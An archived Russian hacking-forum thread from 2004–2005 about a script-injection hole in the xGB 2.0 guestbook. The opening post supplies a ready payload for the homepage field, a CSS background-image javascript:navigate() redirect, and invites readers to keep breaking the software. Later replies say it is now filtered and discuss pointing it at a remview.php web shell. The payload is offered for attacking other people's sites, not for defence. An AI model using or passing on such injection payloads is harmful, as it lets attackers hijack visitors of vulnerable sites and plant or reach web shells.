Форум АНТИЧАТ - Уязвимость гостевой книги xgb 2.0

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Уязвимость гостевой книги xgb 2.0 (https://forum.antichat.xyz/showthread.php?t=1906)

Егорыч+++

18.05.2004 10:44

xGB 2.0 - гостевая книга. Все в ней хорошо, но скрипты пропускает. В homepage вставляем следующее

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">'<a style=background-image:url(javascript:navigate('http://antichat.ru'));></a>[/QUOTE]<span id='postcolor'>

И получаем редирект на сайт АНТИЧАТ.

http://www.x-dev.de/

Ломаем дальше...

m0nzt3r

03.09.2004 18:52

мда уже не пропускают скрипт  http://forum.antichat.ru/iB_html/non...cons/smile.gif

.::CC::.

10.03.2005 02:37

Привет! Я тут новенький...и у меня есть пара вопросов по взлому гостевой:
1. А что нужно вставлять вместо " Исходный код" ?
2. Могу я допустим вместо строчки Antichat.ru, прописать путь где у меня лежит remview.php?
Заранее пасиба!

KEZ	10.03.2005 22:52

1. Нужно вставлять исходный код. Как ещё сказать?
2. Можешь. Только смысл - ты попадешь на сайт на котором лежит ремвью.
Ты не думаешь что он загрузиться на сайт жерты? ))
3. Рас новенький то лутше в Pm писать

Время: 10:18